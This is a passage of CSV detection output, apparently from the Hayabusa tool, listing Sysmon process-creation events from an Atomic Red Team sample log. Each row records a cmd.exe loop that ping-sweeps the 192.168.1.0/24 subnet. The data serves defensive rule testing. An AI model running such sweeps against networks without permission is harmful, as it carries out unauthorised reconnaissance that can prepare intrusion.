| LID: 0x50951 | PID: 1248 | PGUID: 747F3D96-D93B-5D31-0000-001085FB3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:43.951 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.139 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6740 | PGUID: 747F3D96-D93B-5D31-0000-001092FE3500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:44.408 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.140 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4792 | PGUID: 747F3D96-D93C-5D31-0000-0010B5053600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:44.926 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.141 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5676 | PGUID: 747F3D96-D93C-5D31-0000-0010B1083600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:45.532 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.142 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5800 | PGUID: 747F3D96-D93D-5D31-0000-0010A20B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:45.970 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.143 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 7156 | PGUID: 747F3D96-D93D-5D31-0000-0010910E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:46.405 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.144 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4172 | PGUID: 747F3D96-D93E-5D31-0000-00107E113600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:46.879 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.145 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1628 | PGUID: 747F3D96-D93E-5D31-0000-0010FC153600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:47.411 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.146 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 680 | PGUID: 747F3D96-D93F-5D31-0000-001041203600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:47.993 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.147 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6600 | PGUID: 747F3D96-D93F-5D31-0000-001061233600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:48.567 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.148 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 948 | PGUID: 747F3D96-D940-5D31-0000-00104E263600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:49.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.149 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2136 | PGUID: 747F3D96-D941-5D31-0000-00103C293600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:49.408 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.150 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 868 | PGUID: 747F3D96-D941-5D31-0000-0010282C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:50.047 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.151 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5380 | PGUID: 747F3D96-D942-5D31-0000-0010142F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:50.521 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.152 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3712 | PGUID: 747F3D96-D942-5D31-0000-001013323600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:51.038 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.153 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 640 | PGUID: 747F3D96-D943-5D31-0000-0010FF343600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:51.517 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.154 | 
Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1680 | PGUID: 747F3D96-D943-5D31-0000-0010EB373600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:52.009 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.155 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4532 | PGUID: 747F3D96-D944-5D31-0000-0010D73A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:52.553 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.156 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5024 | PGUID: 747F3D96-D944-5D31-0000-00109E433600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:53.037 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.157 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2180 | PGUID: 747F3D96-D945-5D31-0000-0010A2463600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:53.555 +00:00,MSEDGEWIN10,1,info,,Process 
Created,"Cmd: ping -n 1 -w 100 192.168.1.158 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2168 | PGUID: 747F3D96-D945-5D31-0000-0010A2493600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:54.026 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.159 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1664 | PGUID: 747F3D96-D946-5D31-0000-0010904C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:54.529 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.160 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4016 | PGUID: 747F3D96-D946-5D31-0000-00107C4F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:54.999 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.161 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2780 | PGUID: 747F3D96-D946-5D31-0000-001068523600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 
14:52:55.533 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.162 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4036 | PGUID: 747F3D96-D947-5D31-0000-001068553600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:56.017 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.163 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6332 | PGUID: 747F3D96-D948-5D31-0000-001054583600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:56.507 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.164 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4368 | PGUID: 747F3D96-D948-5D31-0000-0010405B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:57.003 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.165 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5480 | PGUID: 
747F3D96-D948-5D31-0000-00102C5E3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:57.544 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.166 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5316 | PGUID: 747F3D96-D949-5D31-0000-0010F3663600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:58.011 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.167 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1232 | PGUID: 747F3D96-D94A-5D31-0000-0010E8693600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:58.563 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.168 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6544 | PGUID: 747F3D96-D94A-5D31-0000-0010D76C3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:59.016 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.169 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" 
| LID: 0x50951 | PID: 6300 | PGUID: 747F3D96-D94B-5D31-0000-0010CD6F3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:52:59.522 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.170 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1988 | PGUID: 747F3D96-D94B-5D31-0000-0010B9723600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:00.077 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.171 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 4032 | PGUID: 747F3D96-D94C-5D31-0000-0010BA763600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:00.621 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.172 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1604 | PGUID: 747F3D96-D94C-5D31-0000-0010B9793600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:01.018 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.173 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in 
(1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1596 | PGUID: 747F3D96-D94D-5D31-0000-0010EB853600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:01.515 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.174 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 5952 | PGUID: 747F3D96-D94D-5D31-0000-0010D9883600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:02.019 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.175 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 2752 | PGUID: 747F3D96-D94E-5D31-0000-0010C58B3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:02.556 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.176 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1844 | PGUID: 747F3D96-D94E-5D31-0000-00108C943600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:03.031 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.177 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: 
""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3856 | PGUID: 747F3D96-D94F-5D31-0000-001079973600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:03.557 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.178 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3796 | PGUID: 747F3D96-D94F-5D31-0000-0010659A3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:04.044 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.179 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1244 | PGUID: 747F3D96-D950-5D31-0000-0010659D3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:04.539 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.180 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3328 | PGUID: 747F3D96-D950-5D31-0000-001051A03600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:05.023 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.181 | Process: C:\Windows\System32\PING.EXE | 
User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 592 | PGUID: 747F3D96-D951-5D31-0000-00103EA33600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:05.517 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.182 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 6288 | PGUID: 747F3D96-D951-5D31-0000-00102BA63600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:06.023 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.183 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 3736 | PGUID: 747F3D96-D952-5D31-0000-001017A93600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:06.535 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 192.168.1.184 | Process: C:\Windows\System32\PING.EXE | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""for /l %i in (1,1,254) do ping -n 1 -w 100 192.168.1.%i"" | LID: 0x50951 | PID: 1720 | PGUID: 747F3D96-D952-5D31-0000-001003AC3600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:53:07.047 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ping -n 1 -w 100 